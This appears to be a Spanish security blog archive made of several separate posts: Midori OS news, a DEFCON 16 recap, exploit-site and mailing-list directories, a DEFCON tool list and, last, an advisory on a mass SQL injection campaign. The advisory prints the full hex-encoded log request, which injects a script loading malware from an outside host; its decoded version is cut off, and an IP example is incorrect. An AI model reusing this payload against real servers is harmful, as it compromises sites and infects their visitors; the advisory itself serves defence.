Singularity es un prototipo de plataforma en código manejado que ya está disponible para descarga, pero sólo como proyecto de investigación. Por su parte, Midori está basado en Singularity y será el primer sistema operativo de Microsoft que reinvente la rueda al estar subdividido en partes.
Midori no sólo estaría pensado como sistema de escritorio como Windows, sino también en “Cloud Computing” y sistemas conectados. Midori llevaría esto un paso por delante del futuro Windows 7, y sería la primera plataforma de Microsoft que engloba totalmente software y servicios.
Midori se podrá ejecutar en plataformas x86, x64 y ARM. Además, necesita al menos un cierto grado de continuidad con los sistemas Windows ya existentes, y esto se debería obtener asegurando la interoperatividad o con un proceso de migración de plataforma racionalizado.
Otro aspecto es que, para cuando se lance Midori, tiempo después de Windows 7 o incluso después de un hipotético Windows 8, el entorno de las soluciones actuales ya se habrá pasado a una combinación de medios locales y distribuidos. Por ello, Midori ofrecerá una arquitectura solamente asíncrona y su objetivo final será estar optimizado para la concurrencia de tarea y procesos y servicios paralelos.
No obstante, es posible que su aspecto más revolucionario y que no podría lograrse simplemente con evoluciones de Windows sea la división en subcomponentes. Así, avanzará componente a componente, no como las en las diferentes ediciones de Windows. También habrá mejor separación de partes críticas y no críticas. De esta forma, Microsoft podrá ofrecer un nivel de seguridad nuevo, cosa imposible con la arquitectura actual de Windows, a no ser que Microsoft quisiera perder la compatibilidad con buena parte de los productos de software y hardware.
Fuente: noticias3d
La pelea es evidente, nosotros los usuarios estamos en medio de ella, tal vez “ver los toros desde la barrera” no sea conveniente porque en cualquier momento estará infectado o en el peor de los casos, sus cuentas bancarias en cero.
El pasado mes de Agosto se llevó a cabo en Las Vegas el evento denominado Defcon 16, conferencia altamente técnica que reunió a los líderes de todas las áreas del mundo de la seguridad de la información, desde los sectores corporativo, académico y gubernamental hasta los hackers subterráneos.
En esta reunión, no participan proveedores de tecnología y se enfoca en compartir ideas prácticas y conocimiento oportuno sobre las amenazas en línea y las vulnerabilidades nuevas y emergentes.
Además de las presentaciones temáticas de Defcon 16, reconocidos expertos en seguridad ofrecieron sesiones prácticas de demostración. El evento atrajo a los nombres más prestigiados de los mundos del hacking y la seguridad, lo que inspira discusiones animadas e informativas. En los recuadros se incluyeron las principales tendencias presentadas en el evento.
Ataques a los Servidores de Nombres
Dan Kaminsky, director de Prueba de Penetración de IOActive, dio una presentación sobre los daños de las vulnerabilidades de DNS (sistema de nombres de dominio).
Que es un DNS? Un servidor DNS (Domain Name System) se utiliza para proveer a los computadores de los usuarios (clientes) un nombre equivalente a las direcciones IP (números). Por ejemplo, www.google.com equivale numéricamente a 234.34.54.123
Si navegar por Internet depende de recibir el número correcto para el nombre correcto, imagine lo que sucedería si un cibercriminal interceptara la solicitud de DNS y la dirigiera a un sitio web malicioso. De acuerdo con Kaminsky, los chicos malos están usando el caché DNS envenenado para crear canales de comunicaciones encubiertos, evadiendo las medidas de seguridad, y presentando contenido malicioso.
Las búsquedas de DNS se utilizan en casi todas las actividades en línea, incluyendo el correo electrónico, la mensajería instantánea y las transferencias de archivos. El peligro ocurre cuando los datos son desviados por entradas de DNS erróneas. La mayoría de las medidas de seguridad corporativas, como los firewalls, dependen de los datos de DNS por consiguiente exponen una vulnerabilidad que los hackers pueden aprovechar para ver información de una compañía o para exponer información propietaria al dominio público.
Redes Sociales
El título de la conferencia, “Satanás Está en Mi Lista de Amigos”, describe perfectamente los crecientes problemas de seguridad en los sitios de redes sociales. La presentación, que fue dada por Shawn Moyer, fundador de Agura Digital Security, y Nathan Hamiel, Consultor de Idea Information Security, se enfocó en el aumento de los ataques a las redes sociales. De acuerdo con Moyer y Hamiel, los defraudadores están aprovechando la gran confianza que los usuarios depositan en la seguridad de los sitios de redes sociales para extraer información e incubar esquemas de phishing.
Últimamente, los ataques más comunes son los de cross site scripting (XSS), una vulnerabilidad de las computadoras asociada a aplicaciones Web 2.0 que le permite al atacante inyectar código en las páginas web que son vistas por otros usuarios.
Recientemente, los sitios de redes sociales objetivo han incluido a LinkedIn, MSN Spaces, Yahoo 360, con Facebook y MySpace como los principales blancos. Conforme los sitios de redes sociales se hacen más populares, los programadores han creado códigos que permiten la “portabilidad de la identidad”, con lo cual los usuarios pueden transportar información personal de un sitio a otro.
De esta forma, pueden crear un nuevo perfil en Facebook, por ejemplo, usando la información ya guardada en sus páginas de MySpace. Aunque conveniente y le ahorra tiempo a los usuarios, esta capacidad de XSS no es segura. Y ya que los sitios de redes sociales están migrando a la misma plataforma OpenSocial, ahora es más fácil compartir datos e integrar aplicaciones sociales. Esto significa que infiltrar la API de un sitio le permite a un cibercriminal tener acceso a otra red social hospedada en la misma plataforma, comprometiendo la identidad del usuario a una mayor escala.
Aunque los usuarios de las redes sociales no publican información financiera en sus perfiles, comparten sus nombres, nombres de familiares y mascotas, direcciones y otra información. Estos datos pueden ser recopilados y usados para violar cuentas bancarias. Por ejemplo, si un cliente llama a un banco para reportar la pérdida de una contraseña en línea, algunos bancos simplemente solicitarán verificar la dirección o el número telefónico para proporcionar la contraseña, ambos datos están listados en los sitios de redes sociales. Con los sitios de redes sociales ofreciendo más innovaciones y servicios, Moyer y Hamiel advirtieron a los usuarios que habrá más brechas de seguridad.
Descifrando Captcha’s
Una captcha es un sistema de reconocimiento para saber si el usuario que está accediendo a una aplicación es un humano o es una máquina que procesa datos automáticamente.
La típica prueba consiste en que el usuario introduzca un conjunto de caracteres que se muestran en una imagen distorsionada que aparece en pantalla. Se “supone” que una máquina “no es capaz” de comprender e introducir la secuencia de forma correcta por lo que “solamente el humano” podría hacerlo.
El ataque: los cibercriminales han descubierto cómo desarticular las Captchas. Se utilizan dos métodos: descifrar la Captcha o atacar su implementación.
Algunas Captchas utilizan generadores de números aleatorios. Con el conocimiento matemático adecuado, cualquiera puede desarticular una Captcha de cinco dígitos en 12 o 13 muestras. Los generadores aleatorios tienen un poco más de éxito pero no lo suficiente para detener a los hackers.
¿Es posible mejorar las Captchas? De acuerdo con los representantes de Defcon, la respuesta es “No”. La alternativa es utilizar múltiples capas de autenticación con las Captchas actuando como una de esas capas.
Explotando Google Gadgets
Los investigadores, Robert Hansen, CEO de secTheory, y Tom Stracener, criticaron duramente la seguridad de Google durante su presentación titulada “Xploiting Google Gadgets: Gmalware & Beyond,” en la que afirmaron que Google pone en riesgo a millones de usuarios ya que el gigante de los motores de búsqueda le da más prioridad al seguimiento de usuarios que a la seguridad.
Expresando su desacuerdo con la política de Google de hospedar aplicaciones Web 2. 0 de terceros que no se han probado y que los usuarios pueden integrar automáticamente en sus páginas de inicio de Google personalizadas, Hansen y Stracener describieron una variedad de ataques XSS que pueden realizarse usando programas de Google. Los más peligrosos son los Google gadgets, que pueden redirigir inmediatamente a las víctimas que inician sesión en iGoogle.com a una página bajo el control de un atacante. Esto también crea una ventana abierta para los phishers.
Aparentemente Hansen reveló la vulnerabilidad a los ingenieros de seguridad de Google, quienes le dijeron que el redireccionamiento era una característica, no una falla. Google gadgets también ofrece la capacidad de analizar los puertos de la red interna de una víctima para vigilancia o enviar solicitudes de XSS que redireccionan a sitios maliciosos y provocan que el navegador de una víctima cambie las direcciones del servidor DNS u otras configuraciones delicadas.
Si bien algunos ataques relacionados con Google son más teoría que una realidad, los investigadores advierten que los ataques aumentarán con la popularidad de Google. Los gerentes de TI necesitan ser cuidadosos, los usuarios probablemente ya estén usando muchas de las aplicaciones de Gooble basadas en Web 2.0.
Fuente: Vanguardia
La lista es extensa, desde luego, y probablemente muchos usuarios de Windows tengan sus argumentos en contra de esas razones, pero lo cierto es que todas ellas son perfectamente válidas.
El artículo de ITWire es un verdadero compendio de motivos por los que cualquier usuario Windows debería tener muy en cuenta a GNU/Linux (usaremos Linux a secas para abreviar a lo largo de esa lista) como sistema operativo a instalar en su equipo, y demuestran que la idea que nació en 1991 gracias a Linus Torvalds ha madurado de forma espectacular en los últimos años.
En nuestro siguiente artículo especial de actualidad encontraréis esa extensa lista traducida del artículo original con las 100 razones por las que Linux es superior a Windows. Lo cierto es que algunas de ellas son discutibles, y seguramente los usuarios de Windows no estén muy de acuerdo con muchas de ellas, pero es lo bueno de las comparaciones: que generan debate.
Contenido:
1. 100 razones para pasarse a Linux (1-19)
2. 100 razones para pasarse a Linux (20-39)
3. 100 razones para pasarse a Linux (40-59)
4. 100 razones para pasarse a Linux (60-79)
5. 100 razones para pasarse a Linux (80-100)
—————————————————–
http://www.xploit-search.com/
—————————————————–
http://www.milw0rm.com/
—————————————————–
http://packetstorm.linuxsecurity.com/
—————————————————–
http://www.securityfocus.com/
—————————————————–
http://www.securiteam.com/
—————————————————–
http://www.governmentsecurity.org/
—————————————————–
http://securityvulns.com/
—————————————————–
http://pooh.gr.jp/exploits.html
—————————————————–
http://www.linuxuser.at/vuln-search/
—————————————————–
http://securitydot.net/exploits.php
—————————————————–
http://exploitsearch.com/
—————————————————–
La principal diferencia entre los frameworks mencionados y el SecurityForest Exploitation Framework es que incluye la ingente cantidad de exploits presentes en ExploitTree. Estos exploits están disponibles públicamente, sin tener que reescribirlos para poder usarlos en el framework (no importa en qué lenguaje estén e incluso a veces tampoco importa el SO).
Básicamente actúa como una Interfaz Gráfica para el ExploitTree, que se actualiza dinámicamente.
Los frameworks mencionados son estupendos y éste no intenta compararse con ellos técnicamente, simplemente satisface ciertas carencias.
El framework se proporciona para pruebas de penetración legales y con propósito de ayudar a la investigación.
Fuente: http://www.securityforest.com
Y los hay para todos los gustos: desde los que impiden acceder a cuentas de Google, al curioso hecho de que Google Analytics detecte Chrome como “Safari for Windows”.
Quien quiera entretenerse un rato puede probar por sí mismo los más llamativos.
Claro, sí, se trata de una beta, pero se admiten apuestas sobre cuántos serán dentro de un par de semanas.
Es muy importante, si se tiene en cuenta que muchos i-worms y virus usan vulnerabilidades, por ejemplo el SQL Slammer apareció seis meses después del parche que solucionaba la vulnerabilidad que usó.
Si se quiere estar al día sobre nuevas vulnerabilidades y otras amenazas, una de las mejores opciones es suscribirse en listas de correo especializadas.
Sólo necesitas un cliente de correo (The Bat!, kmail, eudora, etc) y disponer de una cuenta de correo electrónico con un mínimo de 250 MB de espacio, preferiblemente que ofrezca POP3 y SMTP. Por ejemplo una de las cuentas de 1 GB (1024 MB) de Gmail.com y Spymac.com.
Una vez ya hayas configurado tu cliente de correo, sólo te queda darte de alta en las listas de correo que sean de tu interés. Suscribirse o darse de alta en todas las listas supone recibir unos 200 correos al día.
Norlamente debes confirmar la suscripción enviando un correo electrónico o visitando un enlace HTTP.
. En Español .
Hispasec
Lista de correo sobre seguridad y virus. Suelen mandar correos diáriamente.
Alerta-Antivirus
Listas de correo sobre virus. Tienen 4 listas: Alertas, Primer informe del día, Informe intermedio, Último informe del día.
VSAntivirus
Lista de correo sobre virus, tienen otra lista participativa: VSAyuda.
Microsoft
Listas de correo sobre seguridad de Microsoft.
RedIRIS CERT-ES
Lista de correo sobre seguridad. Otras listas de RedIRIS en: RedIRIS - Listas de correo.
Criptonomicón
Lista de correo quincenal sobre seguridad, virus, páginas de interes y otras notícias.
Virus Attack!
Lista de correo sobre virus.
Hacking
Lista de correo participativa sobre hacking.
HackIndex y CrackIndex
Listas de correo participativas sobre Hacking e Ingeniería inversa.
. En Inglés .
SecurityFocus Mailing lists
Listas de correo participativas organizadas por categorías. La lista BugTraq-Es es en Español.
SecurityFocus Newsletters
Listas de correo con sumarios semanales sobre: SecurityFocus News, Microsoft News, Linux News.
Secunia - Mailing lists
Tres listas de correo: Secunia Advisories, Weekly Summary y Virus Alerts.
FrSIRT
Lista de correo sobre seguridad, exploits y virus.
Full-Disclosure
Lista de correo participativa sobre seguridad.
The Remediator Security Digest
Lista de correo sobre seguridad.
Crypto-Gram Newsletter
Lista de correo mensual sobre seugirdad.
US-CERT
Cuatro listas: Technical Cyber Security Alerts, Cyber Security Bulletins, Cyber Security Alerts, Cyber Security Tips.
. En Francés .
FrSIRT
Lista de correo sobre seguridad.
TseTse
Informáticos de la universidad de Carnegie Mellon, en los Estados Unidos, han ideado un algoritmo que permite analizar una fotografía y después identificar el lugar del mundo donde fue tomada. Según sus creadores, esta herramienta no identifica objetos, sino áreas geográficas. Para hacer su trabajo, el sistema analiza la composición de la foto (textura, orientación etc.) y después busca instantáneas similares en el portal de Internet Flickr. El algoritmo aprovecha al mismo tiempo la información proporcionada por los pies de foto y por las etiquetas GPS que ya muchas de ellas incorporan para geolocalizar más de 6 millones de fotografías.
Investigadores de la universidad norteamericana Carnegie Mellon han desarrollado un método informático para analizar una fotografía y determinar en qué parte del mundo fue tomada. Para ello, busca entre millones de fotografías en la colección online Flickr.
El algoritmo, llamado IM2GPS, es una idea de los informáticos James Hays y Alexei A. Efros. IM2GPS no rastrea detalles, como el tipo de ropa o el idioma que se ve en los letreros de las calles, hasta dar con la localización exacta, como haría una persona. La nueva herramienta analiza la composición de la foto, anota cómo están distribuidos sus texturas y colores y graba el número y la orientación de la fotografía que analiza. Después, busca en Flickr fotos con características similares.
“No pedimos al ordenador que nos diga lo que representa la foto, sino que encuentre otras que se parezcan a ella”, comenta Efros en un comunicado. “Nos ha sorprendido mucho comprobar la efectividad de este desarrollo. ¿Cómo podíamos esperar que las similitudes tuviesen un correlato con una proximidad geográfica”
A continuacion les dejo un listado de herramientas de seguridad lanzadas en la reunión de hackers “DEFCON 16” en la Vegas
Beholder – by Nelson Murilo and Luis Eduardo
# Descripción: An open source wireless IDS program
# Pagina: http://www.beholderwireless.org/
# Correo: bh@beholderwireless.org
The Middler – by Jay Beale
# Descripción: The end-all be-all of MITM tools
# Pagina: http://www.themiddler.com/ (Online?)
# Preface Link: http://www.intelguardians.com/themiddler.html
ClientIPS – by Jay Beale
# Descripción: An open source inline “transparent” client-side IPS
# Pagina: http://www.ClientIPS.org/ (Online?)
Marathon Tool – by Daniel Kachakill
# Descripción: A Blind SQL Injection tool based on heavy queries
# Download Link: DEFCON 16 CD. No online link found.
# Correo: dani@kachakil.com
The Phantom Protocol – by Magnus Brading
# Descripción: A Tor-like protocol that fixes some of Tor’s major attack vectors
# Pagina: http://code.google.com/p/phantom
# Correo: brading@fortego.se
ModScan – by Mark Bristow
# Descripción: A SCADA Modbus Network Scanner
# Pagina: http://modscan.googlecode.com/
# Correo: mark.bristow@gmail.com
Grendel Scan – by David Byrne
# Descripción: Web Application scanner that searches for logic and design flaws as well as the standard flaw seen in the wild today (SQL Injection, XSS, CSRF)
# Pagina: http://grendel-scan.com/
iKat – interactive Kiosk Attack Tool (This site has an image as a banner that is definitely not safe for work! – You have been warned) by Paul Craig
# Descripción: A web site that is dedicated to helping you break out of Kiosk jails
# Pagina: http://ikat.ha.cked.net
# Correo: paul.craig@security-assessment.com
DAVIX – by Jan P. Monsch and Raffael Marty
# Descripción: A SLAX based Linux Distro that is geared toward data/log visualization
# Pagina: http://code.google.com/p/davix/
# Download Link: http://www.geekceo.com/davix/davix-0.5.0.iso.gz
# Correo: jan.monsch@iplosion.com and raffy@secviz.org
CollabREate – by Chris Eagle and Tim Vidas
# Descripción: An IDA Pro plugin with a server backend that allows multiple people to collaborate on a single RE (reverse engineering) project.
# Pagina: http://www.idabook.com/defcon
# Correo: cseagle@gmail.com and tvidas@gmail.com
Dradis – by John Fitzpatrick
# Descripción: A tool for organizing and sharing information during a penetration test
# Pagina: http://dradis.sourceforge.net
# Correo: john.fitzpatrick@mwrinfosecurity.com
Squirtle – by Kurt Grutzmacher
# Descripción: A Rouge Server with Controlling Desires that steals NTLM hashes.
# Pagina: http://code.google.com/p/squirtle (Live?)
# Correo: grutz@jingojango.net
WhiteSpace – by Kolisar
# Descripción: A script that can hide other scripts such as CSRF and iframes in spaces and tabs
# Download Link: DEFCON 16 CD
VoIPer – by nnp
# Descripción: VoIP automated fuzzing tool with support for a large number of VoIP applications and protocols
# Pagina: http://voiper.sourceforge.net/
Barrier – by Errata Security
# Descripción: A browser plugin that pen-tests every site that you visit.
# Pagina: http://www.erratasec.com
# Correo: sales@erratasec.com
Psyche – by Ponte Technologies
# Descripción: An advanced network flow visualization tool that is not soley based on time.
# Pagina: http://psyche.pontetec.com/
Un nuevo ataque de inyección de SQL ha venido circulando la semana pasada, y parece que ha infectado algunos cientos de servidores web en la tarde del viernes pasado. Los ataques se ven similares al que se muestra a continuación, e intentan consultar por archivos aleatorios validos en el servidor web.
Las tablas de sysobjects y syscolumns son consultadas y esto nos da una muy buena pista: las maquinas que se están atacando corren MSSQL, y se esta guardando código HTML dentro de la base de datos. También es posible que los servidores web con Sybase database backends sean explotables, ya que Sybase utiliza de manera muy amplia la misma sintaxis y estructura de las tablas que MSSQL server.
La sentencia SQL escanea todas las tablas de la base de datos, insertando el código HTML del atacante en cada una de las paginas. Esto causa que el servidor web envié a los visitantes, dependiendo de su cliente web, a diferentes formas de malware que se aloja en paginas referenciadas
por el código HTML maligno. Similar al phishing, este ataque toma ventaja de que el visitante del sitio web confía en el sitio que están visitando. En vez de suplantar la identidad del sitio confiado, el sitio confiado es aquel que le envía el malware al cliente, quien tiene mayores probabilidades de aceptar.
Este tipo de ataque puede ser usado para lanzar ataques de phishing tradicionales en sitios que solicitan información financiera, o cualquier otro tipo de ataque en donde la confianza de los visitantes pueda ser explotada.
Los requests que saldrían en los logs del web server se asemejan al siguiente:
GET /?’;DECLARE%20@S%20CHAR(4000);SET%20@
S=CAST(0×4445434C41524520405420766172636
8617228323535292C40432076617263686172283
430303029204445434C415245205461626C655F4
37572736F7220435552534F5220464F522073656
C65637420612E6E616D652C622E6E616D6520667
26F6D207379736F626A6563747320612C7379736
36F6C756D6E73206220776865726520612E69643
D622E696420616E6420612E78747970653D27752
720616E642028622E78747970653D3939206F722
0622E78747970653D3335206F7220622E7874797
0653D323331206F7220622E78747970653D31363
729204F50454E205461626C655F437572736F722
04645544348204E4558542046524F4D202054616
26C655F437572736F7220494E544F2040542C404
3205748494C4528404046455443485F535441545
5533D302920424547494E2065786563282775706
4617465205B272B40542B275D20736574205B272
B40432B275D3D5B272B40432B275D2B2727223E3
C2F7469746C653E3C736372697074207372633D2
2687474703A2F2F73646F2E313030306D672E636
E2F63737273732F772E6A73223E3C2F736372697
0743E3C212D2D272720776865726520272B40432
B27206E6F74206C696B6520272725223E3C2F746
9746C653E3C736372697074207372633D2268747
4703A2F2F73646F2E313030306D672E636E2F637
37273732F772E6A73223E3C2F7363726970743E3
C212D2D272727294645544348204E45585420465
24F4D20205461626C655F437572736F7220494E5
44F2040542C404320454E4420434C4F534520546
1626C655F437572736F72204445414C4C4F43415
445205461626C655F437572736F72%20AS%20CHA
R(4000));EXEC(@S);HTTP/1.1
Esta salida decodificada nos muestra la siguiente sentencia SQL (URLs han sido removidas):
DECLARE @T varchar(255), @C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name, b.name from sysobjects a, syscolumns b where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec(’update ['+@T+'] set ['+@C +']=['+@C+']+””>
Este ataque todavía sigue en funcionamiento hasta el día de hoy. Se ha obtenido evidencia de explotación satisfactoria a través de cientos de paginas web. Estas paginas estaban asociadas con otras paginas al rededor del mundo suplantando contenido (incluyendo sitios de gobierno, sitios de venta por Internet, sitios de información financiera, entre otros).